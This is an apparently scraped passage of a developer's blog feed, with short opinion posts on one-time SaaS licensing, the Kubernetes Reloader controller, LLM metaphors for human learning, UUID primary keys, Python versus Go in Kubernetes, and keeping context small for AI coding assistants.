Set it up once — and your dev-to-prod pipeline just became a lot less fragile.

]]>

Stop Forcing Subscriptions on your SaaS. Do this instead.

Lakshmi Narasimhan — Thu, 09 Oct 2025 00:00:00 +0000

For the past decade, “SaaS” has been almost synonymous with “subscription.”
Monthly plans. Recurring revenue. The holy grail of predictability.

But let’s be honest — not every product justifies being billed every month.
Some tools solve a short, sharp problem. They’re used heavily once, and then only occasionally, if ever, after that.

Forcing that into a subscription model doesn’t create a loyal customer base. It creates churn.

So, let’s talk about an alternative:a one-time license model that’s installed on the user’s own infrastructure.

They buy it once. You give them the code. They run it wherever they want.

It’s not just a throwback to the old “software license” days — it’s a modern, lean, developer-friendly way to build a business without the overhead of hosting, scaling, and endless retention tactics.

When Subscriptions Don’t Fit

Imagine you’ve built a tool that helps teamsmigrate their customer data from one CRM to another.

Most companies only do this once. They just want it done right.

You could sell this as a $49/month SaaS, but that’s immediately awkward:

Your users might only need it for a few weeks.
You’ll end up with tons of churn.
You’ll need to support inactive users forever because “they’re still subscribed.”

Now imagine instead you sell it as aone-time installable tool.

They pay$499 upfront. You send them the source (or a compiled binary) and a license key. They run it on their own infra — AWS, GCP, their laptop, whatever.

No ongoing hosting costs for you.
No surprise bills for them.
No monthly churn charts haunting you.

Just a clean, value-aligned exchange:they pay for the outcome; you deliver it.

But Isn’t That Giving Away the Code?

Yes — and that’s not as scary as it sounds.

For technical customers (especially startups or agencies),self-hosted + licensed software can be a bigselling point. They get control, compliance, and peace of mind.

And for you? You skip the DevOps, uptime monitoring, and scaling headaches.

You can evenopen-source a limited version and sell the “Pro” edition with additional features, integrations, or automation. That approach builds trust and lowers the barrier to entry — a model proven by countless successful tools (think Plausible, Sentry, or PostHog).

How to Make It Profitable (Without Recurring Revenue)

Let’s be real: one-time payments can kill you if you don’t plan for longevity.

You can’t promise lifetime updates for $49 and expect to survive.
The trick is toprice for sustainability and design smart upsells.

Here’s a simple structure:

Base License (One-Time Purchase)
The core product, installable and self-managed. One license per company, priced based on business value — not your costs.
Example: $499 for the migration tool.
Pro or Enterprise Tier
Unlocks advanced features like API access, audit logs, or multi-user setups.
Example: $1,499 for the “Enterprise Migration Suite.”
Done-for-You Setup
Not everyone wants to fiddle with YAML files or AWS permissions. Offer to set it up for them — fast, clean, and guaranteed to work.
Example: $1,000 for installation and configuration.
Support Retainer (Recurring)
For customers whodo want ongoing help, offer an optional support plan — monthly or yearly — that they can cancel anytime.
Example: $200/month for priority support and updates.
Fixed Support Packages
For those who prefer predictability, offer prepaid support hours.
Example: $800 for 10 hours of support, usable anytime within a year.

The combination of these makes your business sustainable.
You get upfront cash flow from licenses and setups, and optional recurring revenue from support — but without forcing subscriptions on everyone.

A Real Example: Indie Data Migration Tool

Let’s run the numbers.

You sell aself-hosted data migration tool.
You price it at$499 for the standard license.

In your first month, 10 teams buy it. That’s$4,990 upfront.

Out of those, 3 ask for the done-for-you setup at $1,000 each.
Now you’re at$7,990 total.

Two of those teams also sign up for your support retainer at $200/month.

That’s an extra$400 MRR — but it’s optional, not forced.

You’ve built something simple, useful, and profitable — without ever worrying about churn graphs, Stripe retries, or feature bloat to “increase stickiness.”

Actionable Takeaways

Match pricing to value, not format.
Don’t just copy the subscription playbook because everyone else does. Ask yourself: how often will people actually use this thing, and how much pain does it remove? If it’s a one-time fix, charge like it.

Design for autonomy.
Developers love control. Let them host it, own it, and plug it into their stack. You’ll end up with happier customers and fewer support tickets than you’d think.

Price like it matters.
If you’re selling a one-time license, it needs tocover your runway. Don’t shy away from bigger numbers. $499 for something that works beats $49/month for something people cancel in two.

Offer optional continuity.
You don’t have to force subscriptions, but you can still offer them. A support retainer or yearly update plan gives your best customers a way to stay connected — and gives you breathing room.

Keep it simple.
No servers, no churn dashboards, no “engagement loops.” Just build a tool, sell it, and support the people who need it. That’s still a business — and a pretty good one.

In a world obsessed with “monthly recurring revenue,” it’s refreshing to remember you can still build asane, sustainable business by selling software the old-fashioned way — for a fair, one-time price.

Sometimes, the best “recurring” part of your business isn’t the billing.
It’s your reputation for shipping solid tools that solve real problems.

]]>

The Kubernetes Controller That Auto-Reloads Your ConfigMaps

Lakshmi Narasimhan — Tue, 07 Oct 2025 00:00:00 +0000

Every now and then, you stumble upon a Kubernetes project that makes you stop and think, “Wait, why isn’t this built-in?”

Stakater Reloader is one of those for me.

Here’s the problem it quietly solves: Kubernetes Deployments, DaemonSets, and StatefulSets don’t automatically reload when their ConfigMaps or Secrets change. You could update the config file, roll out a new image, patch the deployment — but the pods? They’ll keep running happily with the old values until you manually restart them. It’s one of those “by design” quirks that has tripped up almost every engineer at least once.

Reloader fixes that. It’s a lightweight controller that watches for changes in ConfigMaps and Secrets. When it detects one, it simply triggers a rolling restart of the workloads that depend on them. Nothing fancy, nothing hacky — just Kubernetes done right.

Here’s how it works under the hood. It uses the Kubernetes watch API to monitor resource updates. When a change is observed, it looks for deployments or other workloads annotated with

reloader.stakater.com/auto: “true”

If it finds one, it patches the deployment’s pod template spec — usually by bumping an annotation — forcing Kubernetes to treat it as a new version and trigger a rolling update. No sidecars, no injection tricks, no external scripts. Just a clean use of the existing control-plane semantics.

It’s elegant precisely because it doesn’t reinvent anything. It leans into how Kubernetes already works, filling in an obvious usability gap.

You could argue this is the kind of feature that belongs incore Kubernetes. After all, it’s not “extra functionality” — it’s just common sense. If my config changes, my app should refresh. But Kubernetes’ philosophy has always been to stay minimal, leaving operators and tools to extend behavior. That’s how ecosystems like Stakater exist in the first place.

And yet, Reloader feels different. It doesn’t add complexity; itremoves friction. It codifies a best practice we’ve all implemented in ad-hoc ways — shell scripts, kubectl rollout restart, or CI hacks. In a way, Reloader formalizes something that should have been declarative from day one.

If you look at its implementation, it’s almost deceptively simple — a few controllers, an event handler, and some logic to patch annotations. But simplicity is what makes it beautiful. It’s one of those tools that quietly runs in the background for years without drawing attention — until one day you disable it and everything starts to feel broken again.

The lesson? Some of the most powerful Kubernetes tools don’t add layers of abstraction; they close tiny gaps that make the system feel humane.

Reloader doesn’t try to be clever. It just keeps your pods honest.

]]>

What LLMs Reveal About Human Cognition

Lakshmi Narasimhan — Mon, 06 Oct 2025 00:00:00 +0000

We like to think we’re smarter than the machines we build.

And maybe we are — for now. But something odd has been happening lately.

As I’ve spent more time training, prompting, and poking large language models, I’ve started noticing… echoes.

Not just in their outputs. In theirbehaviours.

In the way they learn.

In how they fail.

In how they improve.

And in the way they pretend.

It started as a metaphor.

Now I believe it’s more than that:

Our brains are wetware LLMs.

Training and the Loop

If you’ve ever trained a model — or even just used one through an API — you start to internalize a rhythm.

Feed it examples.
Check the outputs.
Reinforce the good.
Penalize the bad.
Repeat until it improves.

This isn’t just machine learning.

This is how we learn everything.

When I was younger, trying to improve my Carnatic violin playing, I’d follow the same loop.

Play the swara.

Notice the sour note.

Replay.

Adjust fingering/intonation.

Rinse/Repeat.

Eventually, the feedback loop got shorter. The ear began correcting the hand before the mind even intervened.

That’s tuning.

Or when I’m studying fiction — I don’t just read Dean Koontz or Lee Child. Itype out their stories, word for word. A practice technique suggested by prolific writerDean Wesley Smith.

Copying wasn’t plagiarism. It waspretraining.

You learn cadence by mimicry. You learn structure by absorption.

And then, one day, you surprise yourself with an output that feels original — but you know, deep down, the gradient came from somewhere.

Here’s the eerie part: the more you work with LLMs, the more human they feel — not in consciousness, but in quirks.

1. Overfitting

LLMs that are fine-tuned too aggressively on narrow data start parroting it — losing flexibility.

So do we.

Ever meet someone who mastered one domain and can’t unlearn their habits when switching fields? That’s human overfitting.

2. Hallucinations

LLMs generate plausible nonsense when unsure. So do we.

In meetings. On first dates. During interviews.

Confidence isnot the same as correctness — for both machines and minds.

3. Context windows

LLMs can only “see” a certain number of tokens at once.

So can we.

Ever walk into a room and forget why you went in? That’s a context window shift. Our attention span — bounded. Our memory — fallible.

But we can prime our context deliberately — by journaling, outlining, visualizing. Just like how you “prompt” a model better when you include prior examples.

4. Personas

LLMs can be given system prompts to behave a certain way: “Act like a Shakespearean actor”, “You are a helpful Linux admin”, “You’re a snarky writing coach”.

We do this too. We wear masks.

We speak differently at work than at home.

We switch from teacher mode to student mode.

We code-switch, dialect-shift, self-filter.

These personas aren’t fake.

They’refine-tuned subsets of ourselves, optimized for task and audience.

Do Some Brains Have More Parameters?

Sometimes I wonder: if we stretch the metaphor, do people have different “parameter counts”?

Do some folks just have more neurons wired up, more memory bandwidth, more raw capacity?

Maybe.

But LLMs remind us:parameter count isn’t destiny.

It’s how you train.

What you expose yourself to.

What feedback you seek.

How often you iterate.

Even the largest models are dumb if they’ve been trained on trash.

And even a small model — carefully fine-tuned on the right data, guided with the right prompts — can outperform giants.

Same with people.

We’ve all met someone who had every advantage and squandered it.

We’ve all met someone else — less formally educated, less polished — who radiated clarity and depth because theytrained deliberately.

It’s not about who has the most parameters.

It’s about who’s still in the loop.

LLM attributes as Human Metaphors

Zero-shot vs Few-shot Learning

A child touching a hot stove once? Few-shot learning.

Reading five flashcards before a quiz? Few-shot.

Encountering a new idea and making sense of it because of prior abstractions? That’s zero-shot. That’s transfer.

Prompt Injection

Ever been influenced mid-conversation and changed your tone? That’s human prompt injection.

Context hijacks our behaviour more often than we care to admit.

Temperature

High-temperature models generate more creative outputs.

People too. Under constraints, some freeze(forgive the pun!). Others improvise. Your internal “temperature” — mindset, mood, caffeine level — changes how you think.

Loss function

For models, it’s a calculated gradient.

For us, it’s regret. Embarrassment. The wince of feedback.

Pain and fear are our backpropagation signals.

Where do we excel?

But for all the parallels, there are crucial ways our brains still outclass even the largest models.

LLMs don’twant anything. They don’t have drive, curiosity, fear, embarrassment, or delight. They don’t learn unless someone forces them to. They don’tdecide to improve. We do.

We seek out the loop. We care when we’re wrong. We revise because wewant to get better, not because we’re re-trained on a new batch.

We remember emotionally. The sting of failure. The warmth of praise. The embarrassment of a bad take in public. That visceral encoding is something no model has.

We can self-direct. A model doesn’t wake up one day and say, “I think I need to get better at analogies.” But we do. We read something brilliant and feel inspired. We listen to a master and feel the gap. That’s not loss minimization. That’s ambition.

We generalize across domains in weird, leaky, beautiful ways. A lesson in Carnatic violin may improve our writing cadence. A novel may shape how we manage teams. We mix metaphors, break schemas, leap categories. LLMs struggle with that. They interpolate. We cross-pollinate.

We alsochoose our training data. We can decide what to consume, who to listen to, what to believe. We can uninstall toxic sources. Curate higher quality inputs. Reinforce the patterns we want to keep.

And unlike static models, we have agency over our fine-tuning. We can say: I don’t want to respond that way anymore. I don’t want to be that version of myself. And we can go train a better one.

A model may freeze its weights. But we don’t have to.

We’re wetware — always learning, always plastic, always in the loop.

]]>

Did We Overthink Frontend?

Lakshmi Narasimhan — Sun, 05 Oct 2025 00:00:00 +0000

I miss the 2000s. Not for the fashion. Not for the music. But for the sheer joy of opening a file calledindex.html, writing a few tags, sprinkling in some JavaScript (read: jQuery), and watching things just work. No build steps. No “npm install” that takes 3 minutes and a small prayer. No mysterious folders nameddist ornode_modules that collectively occupy more space than my entire operating system.

Back then, CSS was both cruel and kind. Sure, floats were a nightmare. But at least you knew where the pain came from. You weren’t wrestling with layers of abstraction, you were just yelling at Internet Explorer and calling it a day.

I still remember deploying websites via FTP. You edited the file live on the server. It was cowboy coding. It was wrong. It was also… fast.

Contrast that with today. Want to build a button? Great. First, pick your framework: React, Vue, Svelte, Solid, Astro, Qwik… feeling dizzy yet? Then set up your linter, your formatter, your pre-commit hook. Configure your TypeScript paths. Resolve some cryptic Webpack error about “Cannot read property ‘undefined’ of null”. Finally, install a UI library, override all the defaults, and write ten lines of Tailwind just to get a pill-shaped button with a drop shadow.

And that button still looks different on Safari.

Modern devs love to tout “Developer Experience.” Which is ironic, because the actual experience feels more like IKEA furniture assembly — except every piece came from a different warehouse, and you’re not sure if you accidentally installed a kitchen cabinet in your login form.

We’ve optimized the hell out of everything. Everything except joy.

It’s not that the 2000s were better. They weresimpler. You didn’t need a mental model for hydration or SSR or static generation strategies. You just wrote code, hit refresh, and moved on. Today, you hit refresh and wait for the build to compile while questioning your life choices.

Look, I’m not saying we throw out our modern toolchains and go back to editing HTML in Notepad. I like my hot reloads. I love TypeScript (well, most days). But maybe, just maybe, the past had something to teach us: that frictionless creation matters. That not every project needs a monorepo. That clarity beats cleverness.

So the next time you’re six hours into configuring yourtsconfig.json, ask yourself: what would the 2009 me do?

He’d probably already be done with the project.

Maybe it’s time to make frontend fun again.

]]>

AI Can Build Anything—Except Product Taste

Lakshmi Narasimhan — Sat, 04 Oct 2025 00:00:00 +0000

Everyone says AI makes you “10x more productive.” I’m not sure about that. What it actually made me is… more deliberate.

When execution is basically free, the bottleneck shifts. It’s no longercan I build this? It’sshould I build this?

That sounds obvious, but most of us (me included) are terrible at it. We confuse motion for progress. And AI just cranks the treadmill speed up to 11.

Here’s what I mean.

The other weekend, I let myself play around with the idea of “AI-generated developer dashboards.” Normally, something like that would eat a week of evenings. This time, I had three versions running before breakfast: a React prototype, a Python backend spitting out metrics, and a half-decent mock landing page.

Impressive? Maybe. Useful? Not really. By Sunday night I realized I’d basically built three beautifully useless toys. Execution had been trivial. The problem was never execution—it was me chasing shiny objects.

That’s the AI paradox. It lowers the cost of building so much that the real scarcity becomestaste. Judgment. The ability to say no.

Because here’s the dark side: the opportunity cost of distraction just went up. Before, if I burned a week tinkering on something dumb, at least I learned a few low-level tricks. Now I can burn a week and end up with a full microservice, a CI/CD pipeline, and a Terraform config… for an idea that didn’t deserve any of it. Congratulations, I’ve industrialized my dead ends.

I’ve caught myself doing this with infrastructure experiments, too. AI will happily generate Kubernetes manifests, Helm charts, and CI workflows for whatever hair-brained service I throw at it. The code even looks plausible at first glance. Then I deploy it, watch it explode, and realize the whole thing never needed to exist in the first place. It’s the most polished waste of time imaginable.

And this is why restraint has suddenly become a superpower. The real work isn’t generating more; it’s filtering harder. AI will give you 50 rabbit holes before lunch. If you’re not ruthless about which one you go down, you’re just automating your own distraction.

The old mantra was “ship fast and break things.” AI makes that easier than ever. But there’s a hidden multiplier effect: fast execution with bad strategy doesn’t just fail—it failslouder. You don’t just waste time, you waste time at scale. Meanwhile, the teams with clear strategy and discipline can use the exact same tools to compound wins. Same technology, wildly different outcomes.

This is why I think “thinking” has quietly become underrated. Tinkering used to be the path to learning. Now tinkering is dangerous. You can dig a perfect hole in the wrong place faster than ever. Spending more time deciding where to dig—that’s the skill worth leveling up.

Developers don’t usually like to hear that. We want to build. But in an AI-first world, the rarest and most valuable act might be…not building. Closing the tab. Saying no to the prototype. Choosing boredom over the dopamine hit of “look what I got running.”

So no, AI didn’t make me more productive. It made me picky. It forced me to care about what I was building in the first place.

And that’s the paradox: AI made execution trivial, so the premium is now on taste, judgment, and focus.

If you can’t decide what matters, AI will happily help you drown in what doesn’t.

]]>

5 Ways to Survive an Inherited Codebase

Lakshmi Narasimhan — Fri, 03 Oct 2025 00:00:00 +0000

We spend more time reading code than writing it. And most of that time? We’re reading someone else’s code. Chances are, it’s not an uplifting experience.

Maybe it was a rushed MVP. Maybe it’s a legacy system built by three devs who’ve all since disappeared into the ether. Maybe it’syour code from six months ago, which is somehow worse.

Whatever the case, you’ve inherited it now. Congrats. Here are five things to do when faced with a gnarly codebase that makes you question your career choices.

1. Read It Like an Archaeologist, Not a Critic

You’re not here to judge. You’re here to understand. Pretend you’re brushing dust off a piece of ancient tech, not roasting it on Twitter.

Resist the temptation to label everything “garbage.” Start by asking: what was this trying to do? What constraints might they have had? What shortcuts were probably necessary?

Instead of rewriting it all from scratch (which you won’t), focus on uncovering the original intentions. Sometimes the logic is buried under years of duct tape — but therewas logic once.

Pro move: jot down confusing patterns as questions, not accusations. “Why is this loop reassigning itself?” is better than “wtf is this trash.” It’ll help your future debugging and preserve your sanity.

2. Run It. Break It. Run It Again.

Before you touch a single line, get it running. Locally. In a container. In staging. On a Raspberry Pi duct-taped to your modem. Whatever it takes.

You need to see the beast in motion. Trigger features, hit edge cases, try invalid input. Watch how it responds. Some things will crash spectacularly. Others will weirdly work.

This is how you learn the terrain. Think of it as a reconnaissance mission, not a rescue operation.

And yes, this might involve reading a README last updated in 2019 or figuring out why it depends on a deprecated npm package called leftpad-magic.

3. Map the Landmines

There are always a few “do not touch” areas. Legacy functions nobody understands. Cron jobs that magically keep the business running. Data pipelines held together by tab-delimited CSVs and prayer.

Map these out. Comment them. Annotate them. Make a living doc if you need to. This isn’t overengineering — it’s survival.

Because one day, someone (you?)will try to refactor a critical part at 4:45 PM on a Friday. Your notes might be the thing that prevents a full-blown incident.

Think of it like marking traps in a dungeon. It’s not glamorous, but future-you will thank present-you.

4. Find the “One Smart Thing”

Even the ugliest codebases have one bit of elegant, well-considered design. Maybe it’s a clever bit of caching. Maybe the data model actually anticipates edge cases. Maybe some long-forgotten dev wrote a shell script that worksflawlessly every single time.

Find that piece. Admire it. Then steal the pattern.

Because buried in the wreckage of bad code are usually hints of what the authorwanted the system to be — before it devolved into spaghetti.

Recognizing that “one smart thing” also gives you a thread to pull on if you ever do get the green light to refactor properly.

5. Start Small. Fix What You Touch.

The heroic rewrite is a fantasy. You will not rebuild the system in two weeks with clean architecture and perfect tests. You will get halfway, then get pulled into sprint planning or on-call.

Instead, fix things incrementally. Touching a function? Refactor it. See a poorly named variable? Rename it. Writing a feature? Add tests for the nearby stuff.

This is the Boy Scout Rule: leave the code a little better than you found it.

Over time, these small changes compound. You build trust with teammates. You make future maintenance suck slightly less. You stop fearing the codebase.

Coming Soon…

I’ll be expanding each of these into standalone posts, diving deeper into how to:

Reverse-engineer legacy logic without losing your mind
Use staging environments and logs as your secret weapons
Build minimal but helpful internal docs around landmines
Spot (and reuse) the clever patterns buried in legacy code
Actually make progress on refactoring, even with deadlines

And yes — I’ll include a version for folks who use AI coding assistants (whether it’s Claude, Augment, Copilot, or whatever else). They’re great at speeding things up… and occasionally making legacy code worse in new and exciting ways.

TL;DR: You will inherit bad code. Itwill suck. But with a little strategy — and some sarcasm — you can survive it, improve it, and maybe even learn a thing or two from it.

]]>

The Real Skill AI Won’t Replace

Lakshmi Narasimhan — Thu, 02 Oct 2025 00:00:00 +0000

Ah yes, the mythicalfull stack developer. Fluent in Kubernetesand CSS. Can debug a flaky WebSocket connectionand make the button pop just right in Safari 14.3. Also, fluent in four frontend frameworks, three ORMs, and—if you’re lucky—your company’s internal tooling written in Bash and tears.

It sounds impressive. Until you realize “full stack” is just corporate for “three jobs, one salary, no support.”

The original promise of full stack was noble: break down silos, build end-to-end features, own your code. But somewhere along the way, it mutated. Now it means you’re responsible for everything from designing the API schema to fixing the div that renders weird on IE11. Oh, and could you also write some Terraform while you’re at it?

Let’s be honest: in 2025, “full stack” mostly means “we can’t afford to hire a team, so here’s a to-do list that spans five specialties.”

But here’s the twist: I still think youshould aim for T-shaped skills. Just not the way HR thinks you should.

Because here’s what’s changed: we’ve now got an army of AI copilots ready to autocomplete half your job—badly. They’ll hallucinate types, suggest incorrect regex, and cheerfully rename your variables while subtly breaking the logic.

If you want to survivethis stack, you need to know enough frontend, backend, infra, and AI prompt engineering to know when the machine is lying to you.

Being “T-shaped” doesn’t mean you’re an expert in everything. It means you can go deep where it matters (ideally in your core domain), and navigate the rest well enough to not get wrecked. It means you know when to trust ChatGPT’s code suggestion, and when to back away slowly and grep the logs yourself.

In other words: it’s no longer “full stack vs backend vs frontend.” It’s humans who can collaborate with AI vs humans who are about to get buried in merge conflicts and synthetic bugs.

So yeah, full stack as a job description might be a scam. But beingversatile? That’s survival.

Especially if your AI sidekick starts suggesting you replace your Postgres schema with a single JSON blob. Again.

Source that inspired this post:

An error occurred.

Unable to execute JavaScript.

]]>

Don’t Build the Login Box

Lakshmi Narasimhan — Wed, 01 Oct 2025 00:00:00 +0000

Here’s a fun exercise:

Build your own user authentication from scratch. You’ll need:

Signup forms
Login forms
Password hashing (securely!)
Email verification flows
Forgot password + reset logic
Session management
CSRF protection
OAuth integrations (for when someone wants Google login)
Rate limiting, logging, bot protection…

Fun yet? Probably not.

Now do all of thatcorrectly. With zero bugs. And keep it updated for the next 5 years.

Still want to build it?

Auth Is a Trap for Smart Developers

Itfeels simple. A form, a database, a session cookie.

But auth is like an iceberg. Most of the complexity is invisible until it sinks your app.

You’re not just writing code. You’re handling identity, security, compliance, and user trust. All in a space where one misstep means leaked data or worse.

Services Exist for a Reason

There are entire companies (Auth0, Clerk, Supabase, WorkOS, Descope) dedicated to making auth usable and secure.

They’ve handled edge cases you haven’t even thought of. They obsess over MFA, token expiry, cookie flags, replay attacks. You just want users to log in.

So let them.

But What About Control?

If you need full control for regulatory or product reasons, sure — roll your own. But understand the cost.

It’s not just about writing code. It’s about:

Maintaining that code
Auditing it
Scaling it
Keeping up with evolving best practices

Most apps don’t need a custom auth system. They needworking auth. Now.

The Boring Stuff Should Just Work

Building your own auth is like writing your own TLS implementation. It might be educational. It might even be fun. But it’s rarely the best use of your time.

Ship faster. Sleep better. Let someone else worry about the password reset flow.

Be the dev who ships products, not the one debugging cookie flags at 2am.

Unless you’re building the next Okta, stop building login boxes.

]]>

It Was Just a Primary Key. What Could Go Wrong?

Lakshmi Narasimhan — Tue, 30 Sep 2025 00:00:00 +0000

If you ever want to feel smartand slowly ruin your app’s performance, I highly recommend using UUIDs as your primary keys. Works like a charm.

Like many backend developers, I once believed UUIDs were a sign of architectural maturity. They’re globally unique! Secure! Future-proof! How could that possibly backfire?

So I used UUIDs for everything. Users. Orders. Logs. Probably my lunch orders too.

Everything was fine… until one day, our dashboard took 5 seconds to load user stats. Five. Full. Seconds. That’s an eternity when you’re trying to look competent in front of a customer.

At first, I did what any responsible founder does: I blamed Heroku. Then I blamed Postgres. Then I ranpg_stat_user_indexes.

And there it was. My precious users table had an index so bloated it looked like it had been living off pizza and regret. The B-tree was a mess—fragmented by months of inserting completely random UUIDs. Every new user was wedging itself into a random place in the index like a toddler shoving Legos into a DVD player.

The root cause? UUIDs don’t play nicely with B-tree indexes. They’re not sequential. So instead of nice, ordered inserts, you get chaos—page splits, cache misses, and a slowly dying database.

The fix?

I switched touuid_generate_v1mc(), which creates roughly time-sortable UUIDs. Performance got better. My ego… stayed bruised.

So here’s the rule of thumb.

UUIDs aren’t bad. They’re just not magic.

Use them when

You need to generate IDs across distributed systems.
You don’t want people guessing URLs (/reset-password/:id).
You’re migrating or merging datasets and need guaranteed uniqueness.

Avoid them when

You care about write performance and index size.
You’re joining on them frequently.
You want to be able to debug without going cross-eyed.

Or to put it another way:

If you wouldn’t tattoo a UUID on your arm, maybe don’t use it as your primary key.

]]>

AI Made Me Faster at Procrastinating

Lakshmi Narasimhan — Mon, 29 Sep 2025 00:00:00 +0000

A few weeks ago, I caught myself doing something ridiculous.

I was surrounded by all the tools that are supposed to make me faster, smarter, more efficient—ChatGPT in one tab, Cursor humming in the IDE, Claude on standby for the longer stuff—and somehow… I had spent the entire week refactoring a feature that hadn’t shipped.

Not building. Not testing. Just circling the drain of “making it better.”

That’s when it hit me—not like lightning, but like a slow, shameful realization:

If you’re not shipping weekly, you’re not taking advantage of AI. You’re just bikeshedding with fancier tools.

The New Age of Productive Procrastination

We used to say we couldn’t move fast because the tools were slow. Hard to deploy. Annoying to configure. Models too dumb. Infra too brittle.

Now?

We’ve got tools that can scaffold your backend, write your tests, spin up a UI, generate your changelog, draft your release notes, and create your launch tweet — all before lunch.

So what do we do?

We spend two hours arguing with GPT5 about thetone of our 404 page.

AI hasn’t just made us faster. It’s made usbetter at procrastinating. We can now fine-tune our mediocrity at lightning speed. Polish things that don’t matter. Add “clever” touches no one asked for. Debate prompt styles like they’re sacred texts.

It’s amazing. It’s also a trap.

Your Fancy Setup Doesn’t Matter If Nothing Ships

Every dev team and weekend hacker has access to the same models now. Same open weights, same frameworks, same “build an agent” tutorials.

But some teams are shipping on Fridays.

Others are still fiddling with prompt chains.

The difference isn’t in talent. It’s in rhythm.

Shipping frequently is the new moat. Not because it makes you look good on Twitter, but because the ground underneath is moving. Fast.

A month of “thoughtful planning” can kill your idea before it meets the real world.

But What If It’s Not Ready?

It won’t be.

It never is.

You’ll always want to refactor one more function. Tune one more embedding. Rename one more internal config. You’re not alone — I’ve been there. I still go there, a little too often.

But here’s what I’ve learned the hard way:Nothing improves faster than something you’ve already shipped.

You can’t get feedback on a figment. You can’t iterate on invisible.

A Week Is Enough (Even If It Feels Too Short)

Weekly shipping is a forcing function. It makes you prioritize what’s real over what’s “clever.” It exposes what matters to users versus what just looks impressive in dev chat.

If I can’t scope something to ship in a week, chances are I’m biting more than I can chew.

Some weeks it’s a feature. Some weeks it’s cleanup. Some weeks it’s a one-line fix with a changelog that makes me cringe. That still counts. That’s progress.

The Real Timeline of One Shipping Week

Monday: Noticed my onboarding sucked
Tuesday: Asked ChatGPT to rewrite it (it made it worse, then better)
Wednesday: Wired up telemetry to track rage clicks
Thursday: Built a barely-working feedback button
Friday: Hit deploy. Apologized in advance. Sent it to users anyway.

No magic. Just momentum.

The Ironic Truth

AI is supposed to be a productivity multiplier.

But if you let it, it’ll multiply your perfectionism. Your indecision. Your procrastination.

You’ll feel productive while achieving nothing. Like a hamster with a prompt window.

And the worst part? Itfeels like work. It’s dangerously satisfying.

Which is why now, more than ever, we need to build muscle aroundshipping, not just building.

In 2007, PHP creator Rasmus Lerdorf said,“PHP is about as exciting as your toothbrush. You use it every day, it does the job, it is a simple tool, so what? Who would want to read about toothbrushes?”

That’s the thing about good tools — they’re boring when used well. You don’t marvel at your toothbrush every morning. You just get on with it.

AI tools should be the same. Invisible. Unremarkable. Part of the rhythm.

Ship first. Marvel later.

So What Now?

Set the bar low. Something new every week.

Doesn’t have to be earth-shattering. Justreal. Just live. Just something you can point to and say, “I learned something from this.”

The ones who keep shipping — even small things — are the ones who win this cycle.

Not because they outsmarted the world. But because they stopped arguing with their tools and started using them.

]]>

Your Python Web App is a Memory Hog. Admit It.

Lakshmi Narasimhan — Fri, 26 Sep 2025 00:00:00 +0000

We’ve all seen this movie:

You build a “simple” Flask or Django app. You dockerize it. You deploy it on Kubernetes. Then you look at your node metrics and wonder why your app is eating memory like a Chrome tab farm.

And here comes the uncomfortable truth:Go apps don’t do this.

Concurrency: Built-In vs. Bolted-On

Python still has theGlobal Interpreter Lock. AsyncIO, threads, gevent: all clever duct tape.

Go’s goroutines? Native. Dirt cheap. A Go service can juggle tens of thousands of requests without you even thinking about it. Meanwhile, your Python service is scaling horizontally like it’s on cloud provider commission.

Deployment: One Binary vs. Frankenstack

Running Python in production is like dragging a circus into your Pod spec:

Gunicorn or Uvicorn
WSGI or ASGI adapters
Reverse proxy like Nginx
Virtualenvs just to keep packages sane

Each one is another container, another moving part, another thing to patch.

Go?One binary. One container. One Deployment. Done.

Memory: Lean Pods vs. Hungry Pods

Here’s what happens under load:

Go Pod: ~30–50 MB steady, serving requests.
Python Pod: 200–300 MBper worker.

Kubernetes doesn’t care about your excuses. Requests and limits balloon, the autoscaler spins up more nodes, and your cloud bill burns.

The funny part? Your app isn’t even complex. The runtime is.

Magic vs. Predictability

Python is “dynamic.” Translation: you find out about your bugs at runtime, usually while your Pod is CrashLooping.

Go is boring. Strict. Unforgiving at compile time. But once that binary ships, it just runs. Kubernetes likes boring. Operators like boring. Your SRE team loves boring.

Ecosystem: AI Crown vs. Web Pretender

Yes, Python owns the AI/ML world. If you’re training models, you’re not reaching for Go.

But for web apps? The Python ecosystem is bloated and patchwork. Go’s standard library gives you a production-ready HTTP server out of the box. No circus, no adapters, no excuses.

Python is fantastic for notebooks, scripts, and ML. But for web apps in Kubernetes? It’s a bloated liability.

Go apps scale cleaner, run cheaper, and keep clusters saner.

Stop pretending Python web apps are fine in production. They’re not. They’re expensive. They’re messy. And they’re only still around because developers are in denial.

Sometimes the boring choice is the right one. In Kubernetes, boring wins.

]]>

Your AI Pair Programmer Doesn’t Need a Buffet

Lakshmi Narasimhan — Thu, 25 Sep 2025 00:00:00 +0000

I remember the day way too well. I thought I was being clever.“Let me just paste this entire 5,000-line Python file into KiloCode and let it work its magic.” Efficient. Thorough. Genius.

Except… not.

The Great Context Collapse

What actually happened looked more like watching someone try to drink from a fire hose. The AI took my massive input, nodded politely, and then gave me:

Answers that had nothing to do with my question
Vague “advice” that could apply to literally any project
Confident but wrong takes on my(??) code
References to functions that didn’t even exist

To be clear: this wasn’t a problem with KiloCode itself. It was my fault. I drowned the poor thing.

And yes, the reason I had a 5,000-line Python file in the first place? That’s on me too. I just kept bolting on features without a proper review. One fine day, I looked up and realized the file had become unreadable. But that disaster deserves its own post.

What’s Going On Under the Hood

AI coding assistants only have so much “working memory” — acontext window. When you shove 5,000 lines of code at them, a few things happen:

You blow most of the available window right away
Your actual question gets buried under noise
The model has to guess what’s important in the pile
There’s less room left for follow-up questions

It’s like asking someone to find a single paragraph in a book, then dumping an entire library on their desk and saying,“good luck.”

The Counterintuitive Truth

The less code you show your AI assistant, the better it performs.

I’ve found the sweet spot is usually 200–500 lines. Enough to give context, not so much that the model chokes.

How to Work Smarter With AI Code Assistants

Split files by module or function
Don’t dump an entire repo. Just pull out the piece you care about:

“I need help optimizing this authentication middleware function:”
[paste 50–100 lines here]

Summarize bigger pieces
Let the AI help you write summaries of large sections. Then use those summaries as context alongside the small chunk you actually care about.
Scope your questions
Bad: “Here’s my whole app, how can I improve it?”
Better: “Here’s my caching function. How can I reduce memory usage while keeping O(1) lookups?”
Go iterative
Smaller chunks make conversations faster. You can go back and forth ten times in the same time it takes to chew through one giant code dump.

It’s basically code review etiquette. Nobody wants to wade through a 5,000-line pull request. Smaller, focused changes are easier to reason about — for humans and for AI.

The most useful “prompt engineering” trick I’ve learned isn’t about clever phrasing. It’s about context discipline. Show the AI just enough. Hide the rest.

Next time you’re tempted to paste your whole project in, remember: you’re not giving the model more to work with — you’re giving it more to drown in.

]]>

The Language That Wasn’t Supposed to Be One

